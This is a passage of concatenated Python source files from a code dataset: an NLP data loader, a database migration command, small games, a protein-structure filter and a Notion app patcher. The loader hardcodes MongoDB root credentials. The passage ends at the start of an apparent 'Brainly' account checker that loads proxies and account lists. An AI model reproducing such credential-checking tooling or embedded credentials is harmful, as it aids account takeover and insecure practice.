word_dict.items():\n word_list[index] = word\n\n # generate emb_list\n emb_list = [None for _ in range(voc_size)]\n for index, vector in emb_dict.items():\n emb_list[index] = vector\n\n self._word_dict = word_dict\n self._word_list 
= word_list\n self._emb_mat = np.array(emb_list, np.float32)\n return self\n\n def dump(self, word_column='word', index_column='index', vector_column='vector'):\n \"\"\"Dump the current vocabulary to a dict generator.\n\n Args:\n word_column (str): Column name for word.\n index_column (str): Column name for index.\n vector_column (str): Column name for vector.\n\n Returns:\n A generator of dict object.\n\n \"\"\"\n for word, index in self._word_dict.items():\n vector = self._emb_mat[index]\n yield {\n word_column: word,\n index_column: index,\n vector_column: pickle.dumps(vector)\n }\n\n def generate(self,\n voc,\n iter_pre_trained,\n word_column='word',\n vector_column='vector',\n bound=(-1.0, 1.0),\n verbose_fn=None):\n \"\"\"Generate word embedding.\n\n Args:\n voc (Vocabulary): Vocabulary.\n iter_pre_trained: Iterator/Generator of per-trained word2vec.\n word_column (str): Column name for word.\n vector_column (str): Column name for vector.\n bound (tuple[float]): Bound of the uniform distribution which is used to generate vectors for words that\n not exist in pre-trained word2vec.\n verbose_fn ((int) -> None): Verbose function to indicate progress.\n\n \"\"\"\n # inherit input vocabulary's word_dict and word_list\n self._word_dict = voc.word_dict\n self._word_list = voc.word_list\n\n # generate emb_list\n emb_size = None\n emb_list = [None for _ in range(voc.voc_size)] # type: list\n for i, doc in enumerate(iter_pre_trained, 1):\n if verbose_fn:\n verbose_fn(i)\n word = doc[word_column]\n vector = doc[vector_column]\n if emb_size is None:\n emb_size = len(vector)\n try:\n index = self._word_dict[word]\n except KeyError:\n continue\n emb_list[index] = vector\n\n # If a word is not in the pre-trained embeddings, generate a random vector for it\n for i, vector in enumerate(emb_list):\n vector = emb_list[i]\n if vector is None:\n vector = np.random.uniform(bound[0], bound[1], emb_size)\n emb_list[i] = vector\n\n self._emb_mat = np.array(emb_list, np.float32)\n return self\n\n @property\n def word_dict(self):\n return self._word_dict\n\n @property\n def word_list(self):\n return self._word_list\n\n @property\n def emb_mat(self):\n return self._emb_mat\n\n\nclass Label(object):\n def __init__(self):\n self.not_use = ()\n\n @staticmethod\n def convert_rating_to_POSNEG(ratting):\n if ratting > 3.0:\n return 'POS'\n elif ratting < 3.0:\n return 'NEG'\n else:\n return 'NEU'\n\n @staticmethod\n def get_label_to_index_dict():\n return {\"POS\": 1, \"NEG\": 0}\n\n @staticmethod\n def get_index_to_label_dict():\n return {1: \"POS\", 0: \"NEG\"}\n\n @staticmethod\n def convert_POSNEG_to_plus1minus1(label):\n if label == \"POS\" or label == 1:\n return 1\n elif label == \"NEG\" or label == 0:\n return 0\n\n @staticmethod\n def convert_plus1minus1_to_POSNEG(label):\n if label == \"POS\" or label == 1:\n return \"POS\"\n elif label == \"NEG\" or label == 0:\n return \"NEG\"\n\n\ndef load_w2v_mongo(domain_list):\n print('domai_list',domain_list)\n with pymongo.MongoClient() as conn:\n conn['admin'].authenticate('root', 'SELECT * FROM password;')\n db = conn['zixuan_d']\n coll_vocab = db['pn_vocab']\n\n print('domain_list',domain_list)\n print('Loading vocabulary...')\n voc = Vocabulary()\n voc.load(\n iter_voc_item=(doc for doc in coll_vocab.find({\"domain\":{\"$in\":domain_list}})),\n word_column='word',\n index_column='value'\n )\n word2id = voc.word_dict\n print(f'Vocabulary loaded. 
voc_size={voc.voc_size}')\n\n print('Generating embeddings...')\n\n def verbose(i):\n if i % 10000 == 0:\n print(f'Processing {i}', end='\\r')\n\n emb = WordEmbedding()\n emb.generate(\n voc=voc,\n iter_pre_trained=(\n {'word': doc['word'], 'vec': doc['vec']}\n for doc in conn['word2vec']['glove_840B_300d'].find()\n ),\n word_column='word',\n vector_column='vec',\n verbose_fn=verbose\n )\n w2v = emb.emb_mat\n\n return word2id, w2v, voc.voc_size\n\n\n\n\n\ndef load_y2id_id2y(file):\n y2id = dict()\n id2y = dict()\n with open(file, 'r', encoding='utf-8') as fout:\n for line in fout:\n y, id_y = line.split()\n y2id[y] = int(id_y)\n id2y[int(id_y)] = y\n return y2id, id2y\n\n\n\ndef load_inputs_document_mongo2D(domains, type_data, word_id_file, max_doc_len, encoding='utf-8'):\n if type(word_id_file) is str:\n word_to_id = load_word2id(word_id_file)\n else:\n word_to_id = word_id_file\n\n print(\"domains\",domains)\n\n x, y, sen_len, doc_len = [], [], [], []\n with pymongo.MongoClient() as mongo_client:\n mongo_client['admin'].authenticate('root', 'SELECT * FROM password;')\n db = mongo_client['zixuan_d']\n domain_list = domains\n\n coll_name = db['pn_' + type_data]\n for domain in domain_list:\n coll_reviews = coll_name.find({\"domain\": domain})\n for review in coll_reviews:\n label = review['label']\n if label == 0 or label == '0':\n continue\n t_x = np.zeros((max_doc_len,)) # initialization with zero for padding\n doc = review['lemma']\n doc_flag = False\n doc = ' '.join(doc)\n\n j = 0 # word j\n words = doc.split()\n for word in words:\n if j < max_doc_len:\n if word in word_to_id:\n t_x[j] = word_to_id[word]\n j += 1\n else:\n t_x[j] = word_to_id['UNK'] # word_to_id['UNK'] = 0\n j += 1\n else:\n break\n if j > 2: # if more than two words, treading as a sentence\n doc_flag = True\n\n\n # end for sentences\n if doc_flag:\n doc_len.append(j) # 'the number of sentences' of each doc in a batch\n x.append(t_x)\n # convert_plus1minus1_to_one_zero\n if label == -1 or label == '-1':\n label = int(0)\n y.append(label)\n print('load ' + type_data + ' dataset {} done!'.format(domain))\n y = change_y_to_onehot(y)\n\n return np.asarray(x), np.asarray(doc_len), np.asarray(y)\n\n\ndef domains():\n domain_list = []\n with pymongo.MongoClient() as conn:\n conn['admin'].authenticate('root', 'SELECT * FROM password;')\n db = conn['zixuan_d']\n coll_domain = db['domain2index']\n for item in coll_domain.find():\n domain_list.append(item['domain'])\n domain_list.sort()\n return domain_list\n\ndef compute_embedding(domain):\n word2id, w2v, voc_size = load_w2v_mongo(domain)\n return word2id, w2v, voc_size\n\n\n\ndef load_word2id(domain):\n with pymongo.MongoClient() as conn:\n conn['admin'].authenticate('root', 'SELECT * FROM password;')\n db = conn['zixuan_d']\n coll_vocab = db['pn_vocab']\n\n print('Loading {} vocabulary...'.format(domain))\n voc = Vocabulary()\n voc.load(\n iter_voc_item=(doc for doc in coll_vocab.find({\"domain\": domain})),\n word_column='word',\n index_column='value'\n )\n print(f'Vocabulary loaded. 
voc_size={voc.voc_size}')\n voc.dump()\n word2id = voc.word_dict\n return word2id\n\n\n\ndef change_y_to_onehot(y):\n print(Counter(y))\n class_set = set(y)\n n_class = len(class_set) # the number of classes\n y_onehot_mapping = dict(zip(class_set, range(n_class)))\n print(y_onehot_mapping)\n with open('dat/sentiment/y2id.txt', 'w', encoding='utf-8') as fin:\n for k, v in y_onehot_mapping.items():\n fin.write(str(k) + ' ' + str(v) + '\\n')\n onehot = []\n for label in y:\n tmp = [0] * n_class\n tmp[y_onehot_mapping[label]] = 1 # only tmp[y_onehot_mapping[label]] = 1, others = 0\n onehot.append(tmp)\n return np.asarray(onehot, dtype=np.int32)","sub_path":"reference/UCL/dataloaders/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":17101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634097918","text":"from corehq.apps.cleanup.management.commands.populate_sql_model_from_couch_model import PopulateSQLCommand\n\n\nclass Command(PopulateSQLCommand):\n @classmethod\n def couch_doc_type(self):\n return 'DefaultConsumption'\n\n @classmethod\n def sql_class(self):\n from corehq.apps.consumption.models import DefaultConsumption\n return DefaultConsumption\n\n @classmethod\n def commit_adding_migration(cls):\n return \"d38d08f8616b908f7d5f803f54bc5f775e49ca95\"\n\n def update_or_create_sql_object(self, doc):\n model, created = self.sql_class().objects.update_or_create(\n couch_id=doc['_id'],\n defaults={\n \"type\": doc.get(\"type\"),\n \"domain\": doc.get(\"domain\"),\n \"product_id\": doc.get(\"product_id\"),\n \"supply_point_type\": doc.get(\"supply_point_type\"),\n \"supply_point_id\": doc.get(\"supply_point_id\"),\n \"default_consumption\": round(float(doc[\"default_consumption\"]), 8)\n if doc.get(\"default_consumption\", None) else None,\n })\n return (model, created)\n","sub_path":"corehq/apps/consumption/management/commands/populate_defaultconsumption.py","file_name":"populate_defaultconsumption.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478463630","text":"import logging\nimport random\nimport os\n\n#draw player in the grid\n#make input for movement\n# move the player unless invalid move (past edges)\n#check for win/loss\n# clear the screen\n#draw grid\nlogging.basicConfig(filename='dungeon_logs/game.log', level=logging.DEBUG)\n\nCELLS = [(0,0), (1, 0), (2, 0), (3, 0), (4, 0),\n (0, 1), (1, 1), (2, 1), (3, 1), (4, 1),\n (0, 2), (1, 2), (2, 2), (3, 2), (4, 2),\n (0, 3), (1, 3), (2, 3), (3, 3), (4, 3)]\nwins =0\nloses =0\n\ndef clear_screen():\n # clear the screen\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef get_location():\n # random loc for player\n # random loc for door\n # random loc for monster\n return random.sample(CELLS, 3)\n\ndef draw_map(player_user, player, monster):\n print(\"\")\n print(' _'*5) #strecha\n tile = '|{}' #policko s placeholderom\n\n for cell in CELLS: # pre kazdy element v CELLS, dostane cell hodnotu x,y\n x, y = cell # do noveho x rozbalime tuples z CELLU\n if x < 4: #ak policka su do hodnoty 4, tj nie su kraji\n line_end = \"\" # toto je pre funkciu print na konci aby nevytvarala novy riadok, ale pokracovala\n\n if cell == player:\n output = tile.format('X')\n elif cell in player_user['locations']:\n output = tile.format('.')\n elif cell == monster:\n output = tile.format('O')\n else:\n output = tile.format('_')\n else: # tj ked je x == 4\n line_end = \"\\n\"\n 
if cell == player:\n output = tile.format('X|')\n elif cell == monster:\n output = tile.format('O|')\n else:\n output = tile.format('_|')\n print(output,end=line_end)\ndef game_loop():\n monster, player, door = get_location() #rozbali sa výsledok funkcie do tuples\n player_user = {}\n player_user['locations'] = [player]\n logging.info('monster: {}; door: {}; player: {};'.format(monster, door, player_user['locations']))\n\n playing = True\n\n while playing:\n global loses\n global wins\n clear_screen()\n draw_map(player_user, player, monster)\n valid_moves = get_moves(player)\n\n print('You are currently in room {}'.format(player)) # fill with player position\n print('Monster is currently in room {}'.format(monster)) # fill with monster position\n print('You can move {}.'.format(', '.join(valid_moves))) # available moves\n print('Type \"QUIT\" to quit.')\n print('Type \"stats\" to quit.')\n\n move = input(\"> \")\n move = move.upper()\n\n if move == 'QUIT':\n print(' ** See you next time!!!! **')\n break\n if move == 'STATS':\n print(f'Wins:{wins}\\nLoses:{loses}')\n continue\n if move in valid_moves:\n player = move_player(player, move)\n update_player(player_user, player)\n monster = move_monster(monster)\n if player == monster:\n print(\" ** WoW there! You ready to face the monster fella? ** \")\n loses += 1\n playing = False\n elif player == door:\n print(' ** You won! **')\n wins += 1\n playing = False\n\n else:\n input(' \\n ** Do not run into the wall! **\\n ')\n clear_screen()\n # Good move? Change the player position\n # BAD move - do not change anything\n # On monster - they lose\n # On door - they win\n # Otherwise, loop back around\n else:\n if input('Play again? [Y]/[N]').lower() != 'n':\n game_loop()\n\n\n\n\ndef get_moves(player):\n moves = ['LEFT', 'RIGHT', 'UP', 'DOWN']\n x,y = player\n if x == 0: #if player's 'x' == 0, they can't go left\n moves.remove('LEFT')\n if x == 4:\n moves.remove('RIGHT') #if player's 'x' == 4, they can't go right\n if y == 0:\n moves.remove('UP') #if player's 'y' == 0, they can't go up\n if y == 4:\n moves.remove('DOWN') #if player's 'y' == 4, they can't go down\n return moves\n\ndef move_player(player, move):\n x, y = player\n if move == 'LEFT': #if move == 'LEFT' x - 1\n x -= 1\n if move == 'RIGHT': #if move == 'RIGHT' x + 1\n x += 1\n if move == 'DOWN': #if move == 'DOWN' y + 1\n y += 1\n if move == 'UP': #if move == 'UP' y - 1\n y -= 1\n return x,y\n\ndef update_player(player_user, player):\n player_user['locations'].append(player)\n print(player_user['locations'])\n\ndef move_monster(monster):\n moves = ['LEFT', 'RIGHT', 'UP', 'DOWN']\n x, y = monster\n if x == 0: #if monster's 'x' == 0, they can't go left\n moves.remove('LEFT')\n if x == 4:\n moves.remove('RIGHT') #if monster's 'x' == 4, they can't go right\n if y == 0:\n moves.remove('UP') #if monster's 'y' == 0, they can't go up\n if y == 4:\n moves.remove('DOWN')\n\n new_move = random.choice(moves) # pouzit nahodny sampel z moznych ciest, ktore ostali\n if new_move == 'LEFT': #if move == 'LEFT' x - 1\n x -= 1\n if new_move == 'RIGHT': #if move == 'RIGHT' x + 1\n x += 1\n if new_move == 'DOWN': #if move == 'DOWN' y + 1\n y += 1\n if new_move == 'UP': #if move == 'UP' y - 1\n y -= 1\n return x,y\n\n\n\n\nclear_screen()\nprint('Welcome to the Dungeon.')\ninput('Press enter to 
start!')\nclear_screen()\ngame_loop()\n","sub_path":"VariousGames/dungeons_game.py","file_name":"dungeons_game.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"141191212","text":"def create_board():\r\n#write intro\r\n#catch moves\r\n#test if square is available\r\n#test if squares are left\r\n#three of a kind\r\n#Ask user if they want to play again\r\n#write conclusion \r\n\r\n\tprint(sq[9]+'|'+sq[8]+'|'+sq[7])\r\n\tprint('-----')\r\n\tprint(sq[4]+'|'+sq[5]+'|'+sq[6])\r\n\tprint('-----')\r\n\tprint(sq[1]+'|'+sq[2]+'|'+sq[3])\r\n\tprint('\\n\\n')\r\n\r\nsq=['*']*10\r\nsq[5]='X'\r\nsq[3]='O'\r\n\r\n\r\ndef print_intro():\r\n\t#Ask the player which letter they want to be.\r\n\tletter='*'\r\n\twhile not (letter == 'X' or letter == 'O'):\r\n\t\tprint('Welcome. Do you want to be X or O?')\r\n\t\tletter=input().upper()\r\n\t#First element in the list is the user's letter, second is the computer's\r\n\tif letter == 'X':\r\n\t\treturn ['X','O']\r\n\telse:\r\n\t\treturn ['O','X']\r\n\r\n\r\n\r\n\r\nprint('Type numbers 1-9 to occupy square')\r\nprint('\\n\\n')\r\nprint(':')\r\n\t\r\ndef record_moves():\r\n\t#keep asking until the player names an empty square between 1 and 9\r\n\tmove=10\r\n\twhile move not in range(1,10) or is_sq_occupied(move):\r\n\t\tentry=input('Enter valid move:')\r\n\t\tmove=int(entry) if entry.isdigit() else 10\r\n\tsq[move]='X'\r\n\r\n\r\ndef is_sq_occupied(num):\r\n\t#empty squares still hold the '*' placeholder\r\n\treturn sq[num]!='*'\r\n\t\r\ndef sq_is_full():\r\n\tfor index in range(1,10):\r\n\t\tif sq[index]=='*':\r\n\t\t\treturn False\r\n\treturn True\r\n\r\ndef three_in_a_row():\r\n\treturn ((sq[7]==sq[8]==sq[9] and sq[7]!='*') or\r\n\t(sq[4]==sq[5]==sq[6] and sq[4]!='*') or\r\n\t(sq[1]==sq[2]==sq[3] and sq[1]!='*') or\r\n\t(sq[7]==sq[4]==sq[1] and sq[7]!='*') or\r\n\t(sq[8]==sq[5]==sq[2] and sq[8]!='*') or\r\n\t(sq[9]==sq[6]==sq[3] and sq[9]!='*') or\r\n\t(sq[7]==sq[5]==sq[3] and sq[7]!='*') or\r\n\t(sq[9]==sq[5]==sq[1] and sq[9]!='*'))\r\n\t\r\n\r\ndef play_again():\r\n\t print('Do you want to play again? 
(yes or no)')\r\n\t return input().lower().startswith('y')\r\n\t\r\n\r\n\r\n\r\n\r\n\r\nprint(three_in_a_row())\r\nprint(create_board())\r\nprint(sq_is_full())\r\nprint(print_intro())\r\nprint(play_again())\r\n","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238643438","text":"# Program to calculate the sum of digits in a 3 digits number\n\nimport random\n\n#num = int(input(\"enter a 3 digits number: \"))\n#num = random.random() * 900 + 100\n#num = random.uniform(100,1000)\n#num = int(num)\nnum = random.randint(100,999)\nx1 = num//100\nx2 = (num//10)%10\nx3 = num %10\n\nprint (\"the sum of digits in {0} is: {1}\".format(num, x1+x2+x3))","sub_path":"Shimon_Labs/sumOfDigits.py","file_name":"sumOfDigits.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"180253093","text":"import pygame, sys, random\nfrom pygame.locals import *\npygame.init()\npygame.display.set_caption('Meteor Strike')\n\nclass Variables(object):\n black = (0, 0, 0)\n blue = (0, 0, 255)\n red = (255, 0, 0)\n orange = (255, 150, 0)\n green = (0, 128, 0)\n white = (255, 255, 255)\n fps = 30\n mousex = 0\n mousey = 0\n mouseclicked = False\n gunx = 315\n guny = 300\n clock = pygame.time.Clock()\n direction = random.randint(1,3)\n meteorx = 0\n meteory = 0\n meteors = [False, False, False]\n meteorxstart = [25, 75, 125, 175, 225, 275, 325, 375, 425, 475, 525, 575]\n place = random.randint(0, 11)\n\n\nclass Functions(object):\n displaysurf = pygame.display.set_mode((600, 400))\n\n def drawgame(self):\n Functions.displaysurf.fill(Variables.blue)\n pygame.draw.rect(Functions.displaysurf, Variables.green, [0, 350, 600, 50])\n pygame.draw.polygon(Functions.displaysurf, Variables.red, [(275, 375),\n (315, 300), (355, 375)])\n return\n\n def firemissile(self):\n if Variables.mousey <= 350:\n radius = 1\n for x in range(10):\n pygame.draw.line(Functions.displaysurf, Variables.white, [Variables.gunx,\n Variables.guny], [Variables.mousex, Variables.mousey])\n pygame.display.update()\n Variables.clock.tick(20)\n for x in range(10):\n while radius <= 30:\n if (radius % 2) == 0:\n pygame.draw.circle(Functions.displaysurf, Variables.red,\n [Variables.mousex, Variables.mousey], radius)\n pygame.display.update()\n else:\n pygame.draw.circle(Functions.displaysurf, Variables.orange,\n [Variables.mousex, Variables.mousey], radius)\n pygame.display.update()\n radius += 1\n pygame.display.update()\n radius = 1\n Variables.mouseclicked = False\n return\n else:\n for x in range(500):\n Functions.displaysurf.fill(Variables.red)\n pygame.display.update()\n Variables.mouseclicked = False\n return\n\n def meteors(self):\n Variables.meteory = 0\n Variables.meteorx = Variables.meteorxstart[random.randint(0, 11)]\n direction = random.randint(1,3)\n while 0 <= Variables.meteorx <= 600:\n pygame.draw.rect(Functions.displaysurf, Variables.black, [Variables.meteorx,\n Variables.meteory, 5, 5])\n if (direction % 2) == 0:\n Variables.meteorx += 1\n Variables.meteory += 3\n if Variables.meteory >= 350:\n return\n pygame.display.update()\n Variables.clock.tick(25)\n self.drawgame()\n pygame.display.update()\n else:\n Variables.meteorx -= 1\n Variables.meteory += 3\n if Variables.meteory >= 350:\n return\n pygame.display.update()\n Variables.clock.tick(25)\n self.drawgame()\n pygame.display.update()\n\n\n\n\n def 
mainloop(self):\n while 1:\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n sys.exit()\n if event.type == MOUSEBUTTONUP:\n Variables.mousex, Variables.mousey = event.pos\n Variables.mouseclicked = True\n\n self.drawgame()\n pygame.display.update()\n self.meteors()\n if Variables.mouseclicked == True:\n self.firemissile()\n\n\ngame = Functions()\n\ngame.mainloop()\n","sub_path":"MS.py","file_name":"MS.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501688994","text":"import numpy as np\nimport pandas as pd\n\nimport atom3d.protein.scop as scop\nimport atom3d.util.file as fi\n\n\ndef form_scop_filter(level, allowed=None, excluded=None):\n \"\"\"\n Filter by SCOP classification at a specified level.\n\n Valid levels are type, class, fold, superfamily, family.\n \"\"\"\n if allowed is None:\n allowed = []\n if excluded is None:\n excluded = []\n scop_index = scop.get_scop_index()\n scop_index = scop_index[level]\n\n # Build quick lookup tables.\n if allowed:\n permitted = pd.Series(\n {pdb_code: x.drop_duplicates().isin(allowed).any()\n for pdb_code, x in scop_index.groupby('pdb_code')})\n if excluded:\n forbidden = pd.Series(\n {pdb_code: x.drop_duplicates().isin(excluded).any()\n for pdb_code, x in scop_index.groupby('pdb_code')})\n\n def filter_fn(df):\n pdb_codes = df['structure'].apply(lambda x: x[:4].lower())\n\n if len(allowed) > 0:\n to_keep = permitted[pdb_codes]\n # If didn't find, be conservative and do not use.\n to_keep[to_keep.isna()] = False\n to_keep = to_keep.astype(bool)\n elif len(excluded) > 0:\n to_exclude = forbidden[pdb_codes]\n # If didn't find, be conservative and do not use.\n to_exclude[to_exclude.isna()] = True\n to_exclude = to_exclude.astype(bool)\n to_keep = ~to_exclude\n else:\n to_keep = pd.Series([True] * len(df), index=df['structure'])\n return df[to_keep.values]\n return filter_fn\n\n\ndef form_scop_filter_against(sharded, level, conservative):\n \"\"\"\n Remove structures with matching scop class to a chain in sharded.\n\n We consider each chain in each structure separately, and remove the\n structure if any of them matches any chain in sharded.\n\n This is done at the specified scop level, which can be one of type, class,\n fold, superfamily, or family.\n\n Conservative indicates what we should do about pdbs that do not have any\n scop class associated with them. 
True means we throw out, False means we\n keep.\n \"\"\"\n scop_index = scop.get_scop_index()[level]\n\n def form_scop_against():\n result = []\n for shard in sharded.iter_shards():\n for (e, su, st), structure in shard.groupby(\n ['ensemble', 'subunit', 'structure']):\n pc = fi.get_pdb_code(st).lower()\n for (m, c), _ in structure.groupby(['model', 'chain']):\n if (pc, c) in scop_index:\n result.append(scop_index.loc[(pc, c)].values)\n return np.unique(np.concatenate(result))\n scop_against = form_scop_against()\n\n def filter_fn(df):\n to_keep = {}\n for (e, su, st), structure in df.groupby(\n ['ensemble', 'subunit', 'structure']):\n pc = fi.get_pdb_code(st).lower()\n for (m, c), _ in structure.groupby(['model', 'chain']):\n if (pc, c) in scop_index:\n scop_found = scop_index.loc[(pc, c)].values\n if np.isin(scop_found, scop_against).any():\n to_keep[(st, m, c)] = False\n else:\n to_keep[(st, m, c)] = True\n else:\n to_keep[(st, m, c)] = not conservative\n to_keep = \\\n pd.Series(to_keep)[pd.Index(df[['structure', 'model', 'chain']])]\n return df[to_keep.values]\n return filter_fn","sub_path":"atom3d/filters/scop.py","file_name":"scop.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"44004137","text":"def get_indices_of_item_weights(weights, length, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n \n dictonary = {}\n\n for i in range(length):\n weight = weights[i]\n dictonary[weight]= i\n\n for x in range(length):\n key = limit - weights[x]\n if key in dictonary:\n return(dictonary[key],x)\n\n\n # Your code here\n\n # return None\n","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523697864","text":"\n# Notion Enhancer\n# (c) 2020 dragonwocky \n# (c) 2020 TarasokUA\n# (https://dragonwocky.me/) under the MIT license\n\nimport re\nimport os\nimport sys\nimport platform\nimport subprocess\nfrom shutil import copyfile\nfrom time import sleep\n\n# for toggling notion visibility\nhotkey = 'CmdOrCtrl+Shift+A'\n\n# f'{bold}=== title ==={normal}' = headers\n# '*' = information\n# '...' 
= actions\n# '##' = warnings\n# '>' = exit\n\nbold = '\\033[1m'\nnormal = '\\033[0m'\n\nprint(f'{bold}=== NOTION ENHANCER CUSTOMISATION LOG ==={normal}\\n')\n\ntry:\n filepath = ''\n __folder__ = os.path.dirname(os.path.realpath(__file__)).replace('\\\\', '/')\n if 'microsoft' in platform.uname()[3].lower() and sys.platform == 'linux':\n filepath = '/mnt/c/' + \\\n subprocess.run(\n ['cmd.exe', '/c', 'echo', '%localappdata%'], stdout=subprocess.PIPE).stdout \\\n .rstrip().decode('utf-8')[3:].replace('\\\\', '/') + '/Programs/Notion/resources'\n drive = __folder__[5].capitalize() if __folder__.startswith(\n '/mnt/') else 'C'\n __folder__ = drive + ':/' + __folder__[6:]\n elif sys.platform == 'win32':\n filepath = subprocess.run(['echo', '%localappdata%'], shell=True, capture_output=True).stdout \\\n .rstrip().decode('utf-8').replace('\\\\', '/') + '/Programs/Notion/resources'\n else:\n print(' > script not compatible with your os!\\n (report this to dragonwocky#8449 on discord)')\n exit()\n\n if os.path.isfile(filepath + '/app.asar'):\n print(' ...unpacking app.asar')\n subprocess.run(['asar', 'extract', filepath +\n '/app.asar', filepath + '/app'], shell=(True if sys.platform == 'win32' else False))\n print(' ...renaming asar.app to asar.app.bak')\n os.rename(filepath + '/app.asar', filepath + '/app.asar.bak')\n else:\n print(f' ## file {filepath}/app.asar not found!')\n print(' * attempting to locate')\n if os.path.exists(filepath + '/app'):\n print(' * app.asar was already unpacked: step skipped.')\n else:\n print(' > nothing found: exiting.')\n exit()\n\n if os.path.isfile(filepath + '/app/renderer/preload.js'):\n print(f' ...adding preload.js to {filepath}/app/renderer/preload.js')\n with open(filepath + '/app/renderer/preload.js', 'r', encoding='UTF-8') as content:\n if '/* === INJECTION MARKER === */' in content.read():\n print(' * preload.js already added. 
replacing it.')\n content.seek(0)\n original = []\n for num, line in enumerate(content):\n if '/* === INJECTION MARKER === */' in line:\n break\n original += line\n with open(filepath + '/app/renderer/preload.js', 'w', encoding='UTF-8') as write:\n write.writelines(original)\n else:\n with open(filepath + '/app/renderer/preload.js', 'a', encoding='UTF-8') as append:\n append.write('\\n\\n')\n with open(filepath + '/app/renderer/preload.js', 'a', encoding='UTF-8') as append:\n print(' ...linking to ./resources/user.css')\n with open('./resources/preload.js', 'r', encoding='UTF-8') as insert:\n append.write(insert.read().replace(\n '___user.css___', __folder__\n + '/resources/user.css'))\n else:\n print(\n f' * {filepath}/app/renderer/preload.js was not found: step skipped.')\n\n if os.path.isfile(filepath + '/app/main/createWindow.js'):\n with open(filepath + '/app/main/createWindow.js', 'r', encoding='UTF-8') as content:\n content = content.read()\n print(\n f' ...making window frameless @ {filepath}/app/main/createWindow.js')\n if '{ frame: false, show: false' not in content:\n content = content.replace(\n '{ show: false', '{ frame: false, show: false')\n print(\n f' ...adding \"open hidden\" capabilities to {filepath}/app/main/createWindow.js')\n content = re.sub('\\\\s*\\\\/\\\\* === INJECTION START === \\\\*\\\\/.*?\\\\/\\\\* === INJECTION END === \\\\*\\\\/\\\\s*',\n 'window.show()', content, flags=re.DOTALL).replace('window.show()', \"\"\"\n /* === INJECTION START === */\n const path = require('path'),\n store = new (require(path.join(__dirname, '..', 'store.js')))({\n config: 'user-preferences',\n defaults: {\n openhidden: false,\n maximised: false\n }\n });\n if (!store.get('openhidden') || electron_1.BrowserWindow.getAllWindows().some(win => win.isVisible()))\n { window.show(); if (store.get('maximised')) window.maximize(); }\n /* === INJECTION END === */\n \"\"\")\n with open(filepath + '/app/main/createWindow.js', 'w', encoding='UTF-8') as write:\n write.write(content)\n else:\n print(\n f' * {filepath}/app/main/createWindow.js was not found: step skipped.')\n\n if os.path.isfile(filepath + '/app/renderer/index.js'):\n with open(filepath + '/app/renderer/index.js', 'r', encoding='UTF-8') as content:\n print(\n f' ...adjusting drag area for frameless window in {filepath}/app/renderer/index.js')\n content = content.read()\n top = content.rfind('top')\n content = content[:top] + content[top:].replace(\n 'right: 0', 'right: 420').replace(\n 'top: 0', 'top: 1 ').replace(\n 'height: 34', 'height: 16')\n with open(filepath + '/app/renderer/index.js', 'w', encoding='UTF-8') as write:\n write.write(content)\n else:\n print(\n f' * {filepath}/app/renderer/index.js was not found: step skipped.')\n\n if os.path.isfile(filepath + '/app/main/main.js'):\n with open(filepath + '/app/main/main.js', 'r', encoding='UTF-8') as content:\n print(\n f' ...adding tray support (inc. context menu with settings) to {filepath}/app/main/main.js')\n print(\n f' ...adding window toggle hotkey to {filepath}/app/main/main.js')\n content = content.read()\n with open(filepath + '/app/main/main.js', 'w', encoding='UTF-8') as write:\n if '/* === INJECTION MARKER === */' in content:\n print(' * hotkey.js already added. 
replacing it.')\n original = []\n for line in content.splitlines():\n if '/* === INJECTION MARKER === */' in line:\n break\n original.append(line)\n write.write('\\n'.join(original))\n else:\n write.write(content.replace(\n 'electron_1.app.on(\"ready\", handleReady);',\n 'electron_1.app.on(\"ready\", () => handleReady() && enhancements());') + '\\n')\n with open(filepath + '/app/main/main.js', 'a', encoding='UTF-8') as append:\n with open('./resources/hotkey.js', 'r', encoding='UTF-8') as insert:\n append.write('\\n' + insert.read().replace(\n '___hotkey___', hotkey))\n print(\n f' ...copying tray icon ./resources/notion.ico to {filepath}/app/main/')\n copyfile('./resources/notion.ico',\n filepath + '/app/main/notion.ico')\n print(\n f' ...copying datastore wrapper ./resources/store.js to {filepath}/app/')\n copyfile('./resources/store.js', filepath + '/app/store.js')\n else:\n print(\n f' * {filepath}/app/main/main.js was not found: step skipped.')\n\n print(f'\\n{bold}>>> SUCCESSFULLY CUSTOMISED <<<{normal}')\n\nexcept Exception as e:\n print(f'\\n{bold}### ERROR ###{normal}\\n{str(e)}')\n\nprint(f'\\n{bold}=== END OF LOG ==={normal}')\n","sub_path":"customiser.py","file_name":"customiser.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"323551781","text":"import logging, brainly_api, itertools\n\ninfo = 'Checker by _Skill_'\nlogging.basicConfig(level=logging.INFO)\n\n\n\nclass Checker(object):\n def __init__(self):\n import datetime\n self.io = 0\n self.proxies = []\n self.acc_array = []\n self.date = datetime.datetime.now().strftime(\"%d%m%Y-%H%M%S\")\n try:\n self.filename = open('./results/BRAINLY-{}.txt'.format(self.date), 'a')\n except FileNotFoundError:\n os.mkdir('results')\n self.filename = 